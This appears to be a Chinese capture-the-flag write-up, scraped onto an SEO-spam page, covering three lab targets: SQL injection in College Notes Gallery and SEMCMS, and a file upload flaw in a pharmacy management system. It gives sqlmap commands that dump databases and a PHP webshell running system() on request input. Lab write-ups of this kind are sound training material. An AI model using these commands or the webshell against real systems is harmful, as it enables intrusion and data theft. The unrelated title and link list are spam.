当前位置: 首页 > news >正文

网页设计软件中的css表示手机卡顿优化软件

网页设计软件中的css表示,手机卡顿优化软件,宣讲家网站 家风建设,网站视图错位CVE-2023-7130 靶标介绍: College Notes Gallery 2.0 允许通过“/notes/login.php”中的参数‘user’进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据. 已经告诉你在哪里存在sql注入了,一般上来应该先目录扫…

CVE-2023-7130

靶标介绍:

College Notes Gallery 2.0 允许通过“/notes/login.php”中的参数‘user’进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据.

已经告诉你在哪里存在sql注入了,一般上来应该先目录扫描再进行判断,看是否存在sql注入,这里就直接进行注入

抓包

保存到5.txt中

sqlmap -r 5.txt --batch --dbs

sqlmap -r 5.txt --batch -D notes --tables

sqlmap -r 5.txt -batch -D notes -T flllaaaag --columns

sqlmap -r 5.txt -batch -D notes -T flllaaaag -C flag --dump

CVE-2023-48864

靶标介绍:

SEMCMS是一套支持多种语言的外贸网站内容管理系统(CMS)。SEMCMS v4.8版本存在安全漏洞,该漏洞源于通过 /web_inc.php 中的 languageID 参数发现包含 SQL 注入漏洞。

存在sql注入

进行目录扫描

dirsearch -u http://    -e*

一一访问后,来到install/安装导向

127.0.0.1

semcms

root

root

安装后会来到日志页面

日志里面有后台地址,登录账号和密码

登录

在产品管理页面随便勾选,选择批量上架,抓包,保存为5.txt

经过测试后发现参数languageID并不是注入点,后面的AID才是注入的点

存在时间盲注,注入点是参数AID

有这四个数据库,爆semcms数据库,得表

可以看到flllaaaag表

得到

CVE-2022-30887

靶标介绍:

多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。

 目录扫描后什么都没有

判断应该是需要登录进去,但是邮箱不容易爆破,发现最底下Mayurik可以点击,访问

当在最下面点击那些下载按钮后会访问,接着会弹出一个邮箱

mayuri.infospace@gmail.com

密码尝试mayurik,成功登录进去

找到上传界面,上传一句话木马

上传成功

 访问该网页后返回config.php页面

说明上传成功,且可以执行

连接蚁剑

连接后全是木马文件,还是不死马,点击一下就复制一份

正常情况下是可以直接访问flag的

尝试官方的POC

POC

上传的木马内容

<?php
if($_REQUEST['s']) {
  system($_REQUEST['s']);
  } else phpinfo();
?> 

上传成功

进行get传参

http://www.wangmingla.cn/news/89329.html

相关文章:

  • 网站开发公司福建seo的基础优化
  • 做网站什么内容网易搜索引擎
  • 邢台做网站哪家便宜全网最好的推广平台
  • 做个公司网站要多少钱云速seo百度点击
  • postgresql做网站用什么环境长沙做网站推广
  • 微信订阅号做网站网站优化网络推广seo
  • 万州网站制作城市更新论坛破圈
  • 深圳做棋牌网站建设找哪家公司好营销推广的平台
  • 我的世界怎么自己做皮肤并上传网站成都营销型网站制作
  • 宣传的网站开发需要多少钱制作网页用什么软件
  • 如何做环保管家网站如何在微信上做广告
  • 网站建设功能要求贴吧高级搜索
  • 百度公司给做网站吗搜索引擎广告形式有
  • 钱宝做任务的网站怎么下全网推广平台
  • 长春网站建设联系吉网传媒优咖啡的营销推广软文
  • 股票做空网站房地产十大营销手段
  • 湖南做网站 安全还踏实磐石网络外贸网络推广服务
  • ecshop外贸网站seo优化服务价格
  • 简历电商网站开发经验介绍站长工具权重查询
  • 附近做网站的公司网站seo策划方案案例分析
  • 包装产品做网站免费的云服务器有哪些
  • 做网站写的代号好跟不好的区别十堰seo排名公司
  • ppt模板怎么做 下载网站游戏推广文案
  • 廊坊网站建设精灵福州短视频seo网红
  • h5技术做网站网络推广外包哪个公司做的比较好
  • 花卉物流园做网站的素材2023今日新闻头条
  • 济南网站建设公司晟创未来淘宝网络营销方式
  • 宁波有做网站的地方吗天津seo
  • 可信赖的龙岗网站建设合肥关键词排名
  • 代做机械设计的网站线下宣传渠道和宣传方式